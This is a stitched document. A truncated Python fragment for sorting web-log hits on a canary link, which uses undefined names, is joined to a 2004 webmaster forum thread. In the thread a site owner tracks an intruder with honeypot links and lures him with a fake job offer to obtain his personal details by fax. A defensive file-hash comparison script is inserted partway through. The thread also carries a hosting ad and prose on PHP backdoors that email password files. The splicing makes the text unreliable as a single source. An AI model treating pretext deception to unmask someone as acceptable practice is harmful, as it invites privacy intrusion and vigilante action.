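198.51.100.7 www.example.com - [19/Aug/2004:17:58:51 -0700] "GET /canary-1 HTTP/1.1" 302 302 "http://forum.example.org/showthread.php?threadid=1" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.8 www.example.com - [19/Aug/2004:18:02:10 -0700] "GET /canary-1 HTTP/1.1" 302 302 "http://forum.example.org/showthread.php?threadid=1" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.5 www.example.com - [19/Aug/2004:18:05:00 -0700] "GET /canary-1 HTTP/1.1" 302 302 "-" "curl/7.12"
192.0.2.10 www.example.com - [19/Aug/2004:18:10:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U) Firefox/0.9.2"
this line is truncated
"""

def triage(log_text, token_path, webmail_host):
    """Split hits on token_path into webmail-referred hits and everything else."""
    mail_hits = defaultdict(list)   # ip -> [datetime, ...]
    noise = Counter()               # referer host -> hit count
    unparsed = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            unparsed += 1           # keep a count instead of silently dropping
            continue
        if m["path"] != token_path:
            continue
        host = urlparse(m["referer"]).hostname or "(no referer)"
        if host == webmail_host:
            when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            mail_hits[m["ip"]].append(when)
        else:
            noise[host] += 1
    return dict(mail_hits), noise, unparsed
```

The Referer header is supplied by the client, so this separates noise from the expected hit rather than proving who made a request.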
Old 08-20-2004, 11:55 AM   #88
FrankWhite
Confirmed User
 
Join Date: Nov 2002
Location: nyc
Posts: 3,540
Quote:
Originally posted by SplitInfinity
Hahahah,

Had to change my honeypot link in the emails I sent him because
I got 124 GFY'ers trying to load it up to see what it does.... lol!
That will interfere with my forensics. :-) So I changed it from here on out.

You guys don't wanna be mistaken for Joe hacker do you?

HEY, there could be a nice reality show, Joe Hacker.

:-)

what's your ICQ? i need to get in touch with you.
Old 08-20-2004, 12:11 PM   #89
spacemonk
Confirmed User
 
Join Date: Jul 2004
Location: in da VIP
Posts: 969
SplitInfinity
__________________
I sale fu-fme, hit me up for a killer deal!
Old 08-20-2004, 02:39 PM   #90
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
64791506

:-)
Old 08-20-2004, 02:40 PM   #91
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Thanks for the
Old 08-20-2004, 04:34 PM   #92
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
We sold several accounts yesterday with the offer we posted, it appears that people liked it a lot. We have decided to offer it again today.

Today we have 3 more 10Mb/s Unmetered Dedicated Server packages available.

- P4 2.4ghz
- 1GB RAM
- 80GB IDE
- 10Mb/s Unmetered Bandwidth (10Mb/s port)
- Linux/FreeBSD
- Cpanel available at extra cost if desired.
- $500.00 per month
- FREE SETUP

Use coupon ' chrislovesme ' for 75% off of your order.

--> Click Here to order Instantly <--

We can have you online today. Contact me if you have any questions.
Old 08-20-2004, 04:54 PM   #93
skoalman
Registered User
 
Join Date: Jun 2004
Posts: 94
You can have so much more fun with that guy, you know he's just begging to come at you now.
__________________

ICQ - 172146397
Old 08-20-2004, 05:38 PM   #94
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
hahahah! The guy ICQ'd me!

I sent him an email saying:

SUBJECT: hey dude, ICQ ME.

Wanted to know if I can hire you to do network security for me.
I was referred to you by some porn people.


he replied and is sending me a resume. hahahah!
The fuker lives in Seattle! He is in Russia for the summer to visit
some relatives and study there.
hahaha

I can't wait to get all his info. I will scan the shit when I get the fax.
Note: He is FAXING it to me.... Let's hope the part of Russia where he
is has caller ID.
:-)
Old 08-20-2004, 05:54 PM   #95
JayJay
Confirmed User
 
Join Date: Jun 2002
Posts: 3,739
Quote:
Originally posted by SplitInfinity
hahahah! The guy ICQ'd me!

I sent him an email saying:

SUBJECT: hey dude, ICQ ME.

Wanted to know if I can hire you to do network security for me.
I was referred to you by some porn people.


he replied and is sending me a resume. hahahah!
The fuker lives in Seattle! He is in Russia for the summer to visit
some relatives and study there.
hahaha

I can't wait to get all his info. I will scan the shit when I get the fax.
Note: He is FAXING it to me.... Let's hope the part of Russia where he
is has caller ID.
:-)

BUMP!
You Rock
Old 08-20-2004, 05:59 PM   #96
sixxxthsense
Confirmed User
 
Join Date: Aug 2004
Location: Toronto
Posts: 2,421
Quote:
Originally posted by SplitInfinity
hahahah! The guy ICQ'd me!

I sent him an email saying:

SUBJECT: hey dude, ICQ ME.

Wanted to know if I can hire you to do network security for me.
I was referred to you by some porn people.


he replied and is sending me a resume. hahahah!
The fuker lives in Seattle! He is in Russia for the summer to visit
some relatives and study there.
hahaha

I can't wait to get all his info. I will scan the shit when I get the fax.
Note: He is FAXING it to me.... Let's hope the part of Russia where he
is has caller ID.
:-)

u've taken this to the extreme! what do u plan to do to this fuck?
Old 08-20-2004, 06:01 PM   #97
gwilkins
Confirmed User
 
Join Date: Feb 2004
Location: Vancouver, BC
Posts: 744
Quote:
Originally posted by SplitInfinity
hahahah! The guy ICQ'd me!

I sent him an email saying:

SUBJECT: hey dude, ICQ ME.

Wanted to know if I can hire you to do network security for me.
I was referred to you by some porn people.


he replied and is sending me a resume. hahahah!
The fuker lives in Seattle! He is in Russia for the summer to visit
some relatives and study there.
hahaha

I can't wait to get all his info. I will scan the shit when I get the fax.
Note: He is FAXING it to me.... Let's hope the part of Russia where he
is has caller ID.
:-)

Wow, with the death threat and all the money he's stolen you could put him in jail for a very long time. I'm sure the FBI would love to hear from you. They could just pick him up at the airport in Seattle
Old 08-20-2004, 06:23 PM   #98
KC
Confirmed User
 
Industry Role:
Join Date: Jan 1995
Posts: 2,417
Quote:
Originally posted by exposed
pfttt....not true

pfft... yes.. true.

How can you be certain you have plugged every hole of a rooted box?
__________________

Jupiter Hosting, Inc.
Vice President, Business Development
kc (AT) jupiterhosting.com

Last edited by KC; 08-20-2004 at 06:25 PM..
Old 08-20-2004, 10:20 PM   #99
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
You can be reasonably certain if you know what you are doing and take steps in advance of ever being hacked to prevent major corruption, like kernel level ACLs and so forth, however you cannot ever be truly certain until you first know HOW he got in and WHAT they ran to rootkit your system.

For example, if you find their rootkit, then you can be pretty sure... but
NEVER 100%. I would never say 100% because we're human and we miss
obvious things. Hackers use the psychological understanding they know of us
to abuse us and re-enter our systems....

Lots of hackers embed backdoors in our own php scripts... so even a program
YOU WROTE might have been modified by the hacker without you knowing
to email him your password file so he can run crack on it or even to execute other files he hid on the server at his request by loading a url he hid on your box....
Run on sentences tonight.

:-)
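One way to check for the modified scripts and hidden files the post above mentions is to compare the live web root against a known-good copy kept off the box. This is an added example, not code from the thread; the directory names and PHP file contents are constructed. It assumes the comparison runs from a trusted environment, since tools on a rooted host can be made to report false file contents.

```python
import hashlib
import os
import tempfile

def manifest(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare(known_good, live):
    """Return files modified, added or missing in live relative to known_good."""
    good, now = manifest(known_good), manifest(live)
    return {
        "modified": sorted(p for p in good if p in now and good[p] != now[p]),
        "added": sorted(p for p in now if p not in good),
        "missing": sorted(p for p in good if p not in now),
    }

def demo():
    """Build a constructed known-good tree and a tampered copy, then compare."""
    with tempfile.TemporaryDirectory() as tmp:
        good, live = os.path.join(tmp, "release"), os.path.join(tmp, "webroot")
        for root in (good, live):
            os.makedirs(os.path.join(root, "inc"))
            with open(os.path.join(root, "index.php"), "w") as fh:
                fh.write("<?php include 'inc/db.php'; ?>\n")
            with open(os.path.join(root, "inc", "db.php"), "w") as fh:
                fh.write("<?php $db = connect(); ?>\n")
        # Constructed tampering: one script altered, one unexpected file dropped.
        with open(os.path.join(live, "inc", "db.php"), "a") as fh:
            fh.write("<?php /* unexpected extra code */ ?>\n")
        with open(os.path.join(live, "inc", ".cache.php"), "w") as fh:
            fh.write("<?php /* file not in the release */ ?>\n")
        return compare(good, live)
```

A clean result covers only the files in the compared tree; it says nothing about the kernel, system binaries or scheduled jobs.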
Old 08-20-2004, 10:53 PM   #100
cosis
Confirmed User
 
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,276
i guess we know he doesn't read gfy